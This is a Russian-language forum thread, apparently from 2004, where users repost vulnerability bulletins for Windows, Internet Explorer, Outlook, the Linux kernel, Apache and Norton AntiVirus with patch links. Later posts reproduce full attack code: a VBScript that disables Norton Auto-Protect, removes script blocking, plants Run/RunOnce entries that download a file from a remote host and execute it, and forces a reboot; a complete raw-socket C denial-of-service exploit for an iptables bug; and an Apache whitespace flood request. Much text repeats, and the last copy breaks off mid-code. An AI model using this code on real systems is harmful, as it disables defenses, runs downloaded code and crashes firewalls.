Ну вот, старую тему этот злобный форум удалил... Создал новую. Давненько я тут не писал... Не было ничего важного. Зато КАКОЙ сегодня багтрак... Для Windows и IE...
Итак:
Был опубликован список найденных за сегодня уязвимостей. Вот они (список приведен по мере времени публикации об уязвимостях):
1) Удаленное выполнение произвольного кода в Microsoft Windows NT/2000/2003 (критическое)
2) Удаленный отказ в обслуживании в Microsoft Windows NT/2000/XP
3) Отказ в обслуживании в Microsoft Windows
4) Несколько уязвимостей в Microsoft Windows (критические)
5) Еще две уязвимости в различных версиях Microsoft Windows (критические)
6) Удаленное выполнение произвольного кода в Microsoft Windows XP/2003 (критическое)
1) Уязвимость обнаружена в Microsoft Windows NT/2000/2003. Злонамеренный пользователь может скомпрометировать уязвимую систему.
Удаленный пользователь может представить специально обработанное, чрезмерно длинное сообщение, чтобы вызвать переполнение буфера в NNTP (Network News Transfer Protocol) компоненте. Успешная эксплуатация позволяет выполнить произвольный код на целевой системе, в которой используется NNTP.
Патчи:
Microsoft Windows 2000 Server (requires SP3 or SP4):
http://www.microsoft.com/downloads/details...&displaylang=en
Microsoft Windows Server 2003:
http://www.microsoft.com/downloads/details...&displaylang=en
---
2) Уязвимость обнаружена в Microsoft Windows NT/2000/XP. Удаленный пользователь может вызвать отказ в обслуживании или получить полный контроль над уязвимой системой.
Переполнение буфера обнаружено в NetDDE службе. Уязвимость позволяет удаленному атакующему выполнить произвольный код на уязвимой системе с SYSTEM привилегиями. Служба NetDDE отключена по умолчанию.
Патч для WinXP - http://www.microsoft.com/downloads/details...&displaylang=en
---
3) Уязвимость обнаружена в Microsoft Windows. Злонамеренный пользователь может вызвать отказ в обслуживании.
WebDAV XML Message Handler не ограничивает число атрибутов, которые могут быть определены в XML элементе. Уязвимость может эксплуатироваться через Internet Information Services чтобы заставить WebDAV XML Message Handler использовать всю доступную память и ресурсы CPU, посылая специально обработанный XML документ.
Патчи:
Microsoft Windows 2000 (requires SP3 or SP4):
http://www.microsoft.com/downloads/details...&displaylang=en
Microsoft Windows XP (prior to SP2):
http://www.microsoft.com/downloads/details...&displaylang=en
Microsoft Windows Server 2003:
http://www.microsoft.com/downloads/details...&displaylang=en
---
4) Несколько уязвимостей обнаружено в Microsoft Windows. Злонамеренный пользователь может вызвать отказ в обслуживании, повысить привилегии или скомпрометировать уязвимую систему.
1. Отсутствие ограничений на нескольких Window Management API функциях позволяют злонамеренной программе изменить свойства других программ, запущенных с более высокими привилегиями. В результате локальный пользователь может изменить свойства привилегированного процесса.
2. Уязвимость в компоненте, используемой для обработки VDM (Virtual DOS Machine) подсистемы, позволяет получить доступ к защищенной памяти ядра. В результате злонамеренный локальный пользователь может получить SYSTEM привилегии через специально обработанную программу.
3. Переполнение буфера обнаружено в Graphics Rendering Engine при обработке WMF (Windows Metafile) и EMF (Enhanced Metafile) изображений. Злонамеренный пользователь может создать специально обработанное изображение, чтобы скомпрометировать систему целевого пользователя, открывшего это изображение или посетившего злонамеренный Web сайт.
4. Злонамеренный пользователь может вызвать отказ в обслуживании через специально обработанную программу, эксплуатируя уязвимость в Windows ядре.
Патчи:
Microsoft Windows 2000 (requires SP3 or SP4):
http://www.microsoft.com/downloads/details...&displaylang=en
Microsoft Windows XP (prior to SP2):
http://www.microsoft.com/downloads/details...&displaylang=en
Microsoft Windows Server 2003
http://www.microsoft.com/downloads/details...&displaylang=en
---
5) Две уязвимости обнаружено в различных версиях Microsoft Windows. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
1. Уязвимость обнаружена в пути, которым Windows Shell запускает приложения. Удаленный атакующий может сконструировать специально обработанный Web сайт, чтобы выполнить произвольный код на системе целевого пользователя, посетившего этот сайт.
2. Уязвимость обнаружена в обработке специально обработанных запросов в Program Group Converter. Атакующий может сконструировать специально обработанный запрос, чтобы выполнить произвольный код на системе целевого пользователя, выполняющего некоторые действия, типа открытия прикрепленного файла или клика на html ссылку.
Патчи:
Microsoft Windows NT Server 4.0 Service Pack 6a – http://www.microsoft.com/downloads/details...CB-AD4F31C02EAC
Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 – http://www.microsoft.com/downloads/details...C7-CAC017D633E1
Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 – http://www.microsoft.com/downloads/details...69-D9257F1BE178
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – http://www.microsoft.com/downloads/details...83-324FC9049B94
Microsoft Windows XP 64-Bit Edition Service Pack 1 – http://www.microsoft.com/downloads/details...E4-F8D9966C79D0
Microsoft Windows XP 64-Bit Edition Version 2003 – http://www.microsoft.com/downloads/details...6D-82B09373495F
Microsoft Windows Server 2003 – http://www.microsoft.com/downloads/details...A-6D433DEDC105&
Microsoft Windows Server 2003 64-Bit Edition – http://www.microsoft.com/downloads/details...6D-82B09373495F
---
6) Уязвимость обнаружена в Microsoft Windows XP/2003. Удаленный атакующий может выполнить произвольный код на целевой системе.
Переполнение буфера обнаружено в Сжатых (zipped) Папках при обработке специально сформированных сжатых файлов. Удаленный атакующий может сконструировать специально обработанный сжатый файл, чтобы выполнить произвольный код на системе пользователя, посетившего злонамеренный Web сайт.
Патчи:
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 – http://www.microsoft.com/downloads/details...53-F8355A6861D3
Microsoft Windows XP 64-Bit Edition Service Pack 1 – http://www.microsoft.com/downloads/details...CE-CD15F37264CB
Microsoft Windows XP 64-Bit Edition Version 2003 – http://www.microsoft.com/downloads/details...23-2F5EC24BE63F
Microsoft Windows Server 2003 – http://www.microsoft.com/downloads/details...DC-78734E77D3A9
Microsoft Windows Server 2003 64-Bit Edition – http://www.microsoft.com/downloads/details...23-2F5EC24BE63F
~~~~~~~~~~~~~~~~~~~~~
Восемь уязвимостей обнаружено в Microsoft Internet Explorer. Злонамеренный пользователь может получить полный контроль над уязвимой системой, подменить URL в адресной строке и выполнить код в контексте защищенного Web сайта.
CSS Heap Memory Corruption Vulnerability - CAN-2004-0842: Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код на системе целевого пользователя, просмотревшего эту страницу.
2. Similar Method Name Redirection Cross Domain Vulnerability - CAN-2004-0727: Уязвимость обнаружена в обработке методов навигации функциями, которые имеют похожие названия. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы выполнить произвольный код сценария в Local Machine security zone в Internet Explorer или получить доступ к информации в другом домене.
3. Install Engine Vulnerability - CAN-2004-0216: Уязвимость в Inseng.dll позволяет удаленному атакующему выполнить произвольный код на уязвимой системе.
4. Drag and Drop Vulnerability - CAN-2004-0839: Уязвимость обнаружена в обработке Drag and Drop событий. Удаленный атакующий может сконструировать специально обработанную Web страницу, чтобы записать файл на систему целевого пользователя, посетившего Web страницу или прочитавшего злонамеренное e-mail сообщение.
5. Address Bar Spoofing on Double Byte Character Set Systems Vulnerability - CAN-2004-0844: Уязвимость обнаружена в обработке URL на Double Byte Character Set системах. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы.
6. Plug-in Navigation Address Bar Spoofing Vulnerability - CAN-2004-0843: Уязвимость обнаружен в обработке Plug-in навигации. В результате можно представить произвольный URL в адресной строке, отличный от URL загружаемой страницы.
7. Script in Image Tag File Download Vulnerability - CAN-2004-0841: Уязвимость обнаружен в пути, которым Internet Explorer обрабатывает сценарии в image тэгах. Удаленный атакующий может сконструировать злонамеренную Web страницу, которая запишет файл на систему целевого пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение. В результате удаленный атакующий может получить полный контроль над уязвимой системой.
8. SSL Caching Vulnerability - CAN-2004-0845: Уязвимость обнаружена в пути, которым Internet Explorer подтверждает кэшированное содержание SSL Web сайтов. Удаленный атакующий может запустить произвольный сценарий на защищенном Web сайте.
Патчи:
Internet Explorer 5.01 Service Pack 3 on Windows 2000 SP3: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 5.01 Service Pack 4 on Windows 2000 SP4: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Me: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 on Windows XP: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3, on Microsoft Windows 2000 Service Pack 4, on Microsoft Windows XP, or on Microsoft Windows XP Service Pack 1: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 Service Pack 1 on Microsoft Windows NT Server 4.0 Service Pack 6a, on Microsoft Windows NT Server 4.0 Terminal Service Edition Service Pack 6, on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Me: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 for Windows XP Service Pack 1 (64-Bit Edition): http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 for Windows Server 2003: http://www.microsoft.com/downloads/details...&displaylang=en
Internet Explorer 6 for Windows XP Service Pack 2: http://www.microsoft.com/downloads/details...&displaylang=en
Полная Версия: Багтрак
| i | Зер Гуд :), пасиба \\ AVANTE |
Авант, всегда пожалуйста 
. я сегбе все равно на сайт ставлю - дак почему бы сюда не запихнуть.
Сегодня для линуксоидов:
1) Множественные уязвимости в Linux kernel версии до 2.6.9
----
Обнаружено несколько уязвимостей в ядре Linux, которые могут быть использованы для DoS атаки, обхода ограничений безопасности, раскрытия данных ядра.
1. Локальный пользователь может вызвать отказ в обслуживании системы или получить доступ к данным ядра с помощью определенных вызовов ioctl на интерфейсе терминала, если при этом соседняя нить использует операции чтения/записи.
2. Удаленный атакующий может вызвать отказ в обслуживании, присоединившись к PPP порту. 3. Уязвимость в файловой системе ReiserFS позволяет локальному атакующему получить доступ к важным данным на системе. 4. Уязвимость в виртуальной системе памяти hugetlbfs позволяет локальному атакующему перезаписать содержимое файла.
Исправления уже лежат на http://www.kernel.org
----
2) Удаленное переполнение в iptables в Linux kernel версии до 2.6.8
----
Обнаружено переполнение буфера в iptables. Удаленный атакующий может аварийно завершить работу межсетевого экрана.
Удаленный атакующий может послать специально сформированный IP пакет и аварийно завершить работу системы. Ядро Linux 2.4 неуязвимо.
Патч так же уже есть на www.kernel.org
. я сегбе все равно на сайт ставлю - дак почему бы сюда не запихнуть.Сегодня для линуксоидов:
1) Множественные уязвимости в Linux kernel версии до 2.6.9
----
Обнаружено несколько уязвимостей в ядре Linux, которые могут быть использованы для DoS атаки, обхода ограничений безопасности, раскрытия данных ядра.
1. Локальный пользователь может вызвать отказ в обслуживании системы или получить доступ к данным ядра с помощью определенных вызовов ioctl на интерфейсе терминала, если при этом соседняя нить использует операции чтения/записи.
2. Удаленный атакующий может вызвать отказ в обслуживании, присоединившись к PPP порту. 3. Уязвимость в файловой системе ReiserFS позволяет локальному атакующему получить доступ к важным данным на системе. 4. Уязвимость в виртуальной системе памяти hugetlbfs позволяет локальному атакующему перезаписать содержимое файла.
Исправления уже лежат на http://www.kernel.org
----
2) Удаленное переполнение в iptables в Linux kernel версии до 2.6.8
----
Обнаружено переполнение буфера в iptables. Удаленный атакующий может аварийно завершить работу межсетевого экрана.
Удаленный атакующий может послать специально сформированный IP пакет и аварийно завершить работу системы. Ядро Linux 2.4 неуязвимо.
Патч так же уже есть на www.kernel.org
Подвержена ли Windows XP с установленным сервиспаком 2 этим уязвимостям? Если да то неплохо бы скачать и выложить патчи в виндоус упдэйт на Филине.
да, подвержена. за патчами к тем, у кого инет бесплатный...
Парочка баг для ослиководов (IE, Microsoft)
почта:
Обнаружена уязвимость в Microsoft Outlook. Приложение может отображать графические изображения при просмотре сообщений в текстовом режиме.
Удаленный атакующий может создать MIME сообщение с зашифрованным изображением в кодировке Base64. При просмотре сообщения, будет выведено изображение на монитор. Пример:
<img src="cid:malware">
------=_NextPart_000_0004_01C4B234.2209FD20
Content-Type: image/gif;
name="youlickit[1].gif"
Content-Transfer-Encoding: base64
Content-ID: <malware>
R0lGODlhogCiAOb/AP////8hAP8QAP8AAPdCAPcAAO97AO8IAOfeQufWUu etY+eUA
N7OEN7OAN7G
----
(на самом деле сама бага ничего плохого из себя не представяет, зато вот в картинку может быть встроен код с обращением к серверу, причем вместо адресса картинки может быть указан запрос на изменение пароля, т.е. вы читая почту через аутлук и хостясь где-нить на nm.ru можете отдать свой ящик...)
Более интересная в ИЕ:
Обнаружена уязвимость в Microsoft Internet Explorer при обработке события AnchorClick. Удаленный атакующий может с помощью специально сформированной HTML страницы выполнить произвольный код в контексте зоны безопасности локального компьютера.
Удаленный атакующий может создать HTML код, содержащий событие AnchorClick (для того, чтобы отрыть произвольную директорию на целевой системе используя объект ActiveX Shell.Explorer), и специально сформированное изображение, которое при попытке перетащить его в предыдущее окно, будет сохранено в текущей директории.
Поскольку только файлы определенных типов могут быть сохранены таким образом, специально сформированное изображение должно эмулировать один из следующий форматов: .xml', '.doc', '.py', '.cdf', '.css', '.pdf', '.ppt' и т.д.
Затем HTML может вызвать приложение HTML Help (hh.exe) с некорректным окном для того чтобы отобразить рисунок, который собственно является HTML сценарием. HTML сценарий может прочитать произвольный внешний текстовый файл и сохранить его в формате .hta на целевой системе.
Решение на данный момент не существует. В качестве временного решения возможно установить Kill бит для объекта Shell.Explorer:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}]
"Compatibility Flags"=dword:00000400
(так что лучше воздержаться от посещения непроверенных сайтов, которые могут воспользоваться ею)
Парочка баг для ослиководов (IE, Microsoft)
почта:
Обнаружена уязвимость в Microsoft Outlook. Приложение может отображать графические изображения при просмотре сообщений в текстовом режиме.
Удаленный атакующий может создать MIME сообщение с зашифрованным изображением в кодировке Base64. При просмотре сообщения, будет выведено изображение на монитор. Пример:
<img src="cid:malware">
------=_NextPart_000_0004_01C4B234.2209FD20
Content-Type: image/gif;
name="youlickit[1].gif"
Content-Transfer-Encoding: base64
Content-ID: <malware>
R0lGODlhogCiAOb/AP////8hAP8QAP8AAPdCAPcAAO97AO8IAOfeQufWUu etY+eUA
N7OEN7OAN7G
----
(на самом деле сама бага ничего плохого из себя не представяет, зато вот в картинку может быть встроен код с обращением к серверу, причем вместо адресса картинки может быть указан запрос на изменение пароля, т.е. вы читая почту через аутлук и хостясь где-нить на nm.ru можете отдать свой ящик...)
Более интересная в ИЕ:
Обнаружена уязвимость в Microsoft Internet Explorer при обработке события AnchorClick. Удаленный атакующий может с помощью специально сформированной HTML страницы выполнить произвольный код в контексте зоны безопасности локального компьютера.
Удаленный атакующий может создать HTML код, содержащий событие AnchorClick (для того, чтобы отрыть произвольную директорию на целевой системе используя объект ActiveX Shell.Explorer), и специально сформированное изображение, которое при попытке перетащить его в предыдущее окно, будет сохранено в текущей директории.
Поскольку только файлы определенных типов могут быть сохранены таким образом, специально сформированное изображение должно эмулировать один из следующий форматов: .xml', '.doc', '.py', '.cdf', '.css', '.pdf', '.ppt' и т.д.
Затем HTML может вызвать приложение HTML Help (hh.exe) с некорректным окном для того чтобы отобразить рисунок, который собственно является HTML сценарием. HTML сценарий может прочитать произвольный внешний текстовый файл и сохранить его в формате .hta на целевой системе.
Решение на данный момент не существует. В качестве временного решения возможно установить Kill бит для объекта Shell.Explorer:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A2}]
"Compatibility Flags"=dword:00000400
(так что лучше воздержаться от посещения непроверенных сайтов, которые могут воспользоваться ею)
| QUOTE (makt_liCh @ Oct 13 2004, 07:07 PM) |
| ... Был опубликован список найденных за сегодня уязвимостей.... |
Огромное спасибо!
| i | С таким в личку! |
Вот. Сегодня три новости. Одна про веб-сервер Apache, другая про антивирус Norton Antivirus, третья про iptables. Обе не являются критическими, но патчи на них лучше поставить.
1) Apache 2.0.52 и более ранние версии 2.0.x
Обнаружена уязвимость в Web-сервере Apache. Удаленный атакующий может заставить службу потребить все доступные ресурсы на системе.
Уязвимость существует при обработке пробелов в HTTP GET запросе. Удаленный атакующий может создать большое количество запросов, содержащих большое количество пробелов в заголовках запроса. Пример:
GET / HTTP/1.0\n
[space] x 8000\n
[space] x 8000\n
[space] x 8000\n
8000 раз
Решение - поставить новую версию.
2) Уязвимость обнаружена в Norton Anti-Virus 2004, 2005; Удаленный атакующий может обойти функцию блокирования и изменить конфигурационный файл антивируса.
Удаленный атакующий может с помощью специально сформированного сценария обойти блокировку сценариев и выполнить злонамеренные действия на системе. Пример:
--------------//// BEGIN DISABLE_NAV.VBS ////-----------------
' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
& "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode("Disabled")
Next
' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ----------
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
" +chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.s end:set
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- LAUNCH EICAR DOWNLOADER ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- RUN THE 'VIRUS' ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
str KeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4
--------------//// END DISABLE_NAV.VBS ////-----------------
Решение - ждать пока выйдет патч, а потом скачать через live-update
3) В iptables позавчера (не смог написать тогда, меня не было у компа) была найдена бага в iptables ниже 2.6.8. Возможно DoS атака на нее. Решение - качать патч.
А эксплойт вот он:
/*
*
* iptables.log.integer.underflow.POC.c
*
* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
*
* felix__zhou _at_ hotmail _dot_ com
*
* */
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];
static unsigned char sip[4];
static unsigned int sa;
static unsigned short sp;
static unsigned char sport[2];
/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = ip;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/
static void tcp_csum(unsigned char *tcp, unsigned char *ip,
unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = tcp;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
csum += (ip[12] << 8) + ip[13];
csum += (ip[14] << 8) + ip[15];
csum += (ip[16] << 8) + ip[17];
csum += (ip[18] << 8) + ip[19];
csum += 0x06;
csum += 0x14;
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
static int work(SOCKET s)
{
DWORD ret = 1;
unsigned char buf[1500];
unsigned char *ip;
unsigned char *tcp;
unsigned int seq = 0x01;
struct sockaddr_in host;
ZeroMemory(buf, 1500);
ip = buf;
tcp = buf + 20;
ip[0] = 0x45; /* ver & hlen */
ip[3] = 0x28; /* tlen */
ip[8] = 0x80; /* ttl */
ip[9] = 0x06; /* protocol */
ip[10] = ip[11] = 0;
ip[12] = sip[0]; /* saddr */
ip[13] = sip[1];
ip[14] = sip[2];
ip[15] = sip[3];
ip[16] = dip[0]; /* daddr */
ip[17] = dip[1];
ip[18] = dip[2];
ip[19] = dip[3];
tcp[0] = sport[0];
tcp[1] = sport[1];
tcp[2] = dport[0]; /* dport */
tcp[3] = dport[1];
tcp[12] = 0x40; /* hlen */ /* HERE */
tcp[13] = 0x02; /* flags */
ZeroMemory(&host, sizeof(struct sockaddr_in));
host.sin_family = AF_INET;
host.sin_port = dp;
host.sin_addr.s_addr = da;
for (;; ) {
tcp[4] = (seq >> 24); /* seq number */
tcp[5] = ((seq << 8) >> 24);
tcp[6] = ((seq << 16) >> 24);
tcp[7] = ((seq << 24) >> 24);
tcp[16] = tcp[17] = 0;
seq ++;
tcp_csum(tcp, ip, 0x14, tcp + 16);
if (SOCKET_ERROR == sendto(s, buf, 0x28, 0,
(SOCKADDR *)&(host), sizeof host)) {
if (WSAEACCES != WSAGetLastError()) {
printf("sendto() failed: %d\n",
WSAGetLastError());
ret = 1;
} else {
printf("You must be Administrator!\n");
}
break;
}
}
return ret;
}
static char usage[] = "Usage: %s dip dport sip sport\n";
int main(int argc, char **argv)
{
WORD ver = MAKEWORD(2, 2);
WSADATA data;
unsigned char *p;
SOCKET s;
int ret = 1;
BOOL eopt = TRUE;
if (5 != argc) {
printf(usage, argv[0]);
goto out;
}
if (INADDR_NONE == (da = inet_addr(argv[1]))) {
printf("dest ip address is NOT valid!\n");
printf(usage, argv[0]);
goto out;
}
p = (unsigned char *)&da;
dip[0] = p[0];
dip[1] = p[1];
dip[2] = p[2];
dip[3] = p[3];
dp = atoi(argv[2]);
dport[0] = ((dp << 16) >> 24);
dport[1] = ((dp << 24) >> 24);
if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
printf("source ip address is NOT valid!\n");
printf(usage, argv[3]);
goto out;
}
p = (unsigned char *)&sa;
sip[0] = p[0];
sip[1] = p[1];
sip[2] = p[2];
sip[3] = p[3];
sp = atoi(argv[4]);
sport[0] = ((sp << 16) >> 24);
sport[1] = ((sp << 24) >> 24);
srand((unsigned int)time(0));
if (WSAStartup(ver, &data)) {
printf("WSAStartup() failed\n");
goto out;
}
if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0)))
goto err;
if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL,
(char *)&eopt, sizeof(eopt)))
goto err1;
work(s);
err1:
closesocket(s);
err:
WSACleanup();
out:
return ret;
}
P.S. BSD-шникам. Я надеюсь, вы уже поставили релиз новой фряхи на свой комп? (это в основном про филина...)
1) Apache 2.0.52 и более ранние версии 2.0.x
Обнаружена уязвимость в Web-сервере Apache. Удаленный атакующий может заставить службу потребить все доступные ресурсы на системе.
Уязвимость существует при обработке пробелов в HTTP GET запросе. Удаленный атакующий может создать большое количество запросов, содержащих большое количество пробелов в заголовках запроса. Пример:
GET / HTTP/1.0\n
[space] x 8000\n
[space] x 8000\n
[space] x 8000\n
8000 раз
Решение - поставить новую версию.
2) Уязвимость обнаружена в Norton Anti-Virus 2004, 2005; Удаленный атакующий может обойти функцию блокирования и изменить конфигурационный файл антивируса.
Удаленный атакующий может с помощью специально сформированного сценария обойти блокировку сценариев и выполнить злонамеренные действия на системе. Пример:
--------------//// BEGIN DISABLE_NAV.VBS ////-----------------
' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
& "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode("Disabled")
Next
' -------- UNINSTALL SCRIPT BLOCKING WITH WMI
----------const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
" +chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.s end:set
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- LAUNCH EICAR DOWNLOADER ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' -------- RUN THE 'VIRUS' ----------
Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
str KeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4
--------------//// END DISABLE_NAV.VBS ////-----------------
Решение - ждать пока выйдет патч, а потом скачать через live-update
3) В iptables позавчера (не смог написать тогда, меня не было у компа) была найдена бага в iptables ниже 2.6.8. Возможно DoS атака на нее. Решение - качать патч.
А эксплойт вот он:
/*
*
* iptables.log.integer.underflow.POC.c
*
* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)
*
* felix__zhou _at_ hotmail _dot_ com
*
* */
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
static unsigned char dip[4];
static unsigned int da;
static unsigned short dp;
static unsigned char dport[2];
static unsigned char sip[4];
static unsigned int sa;
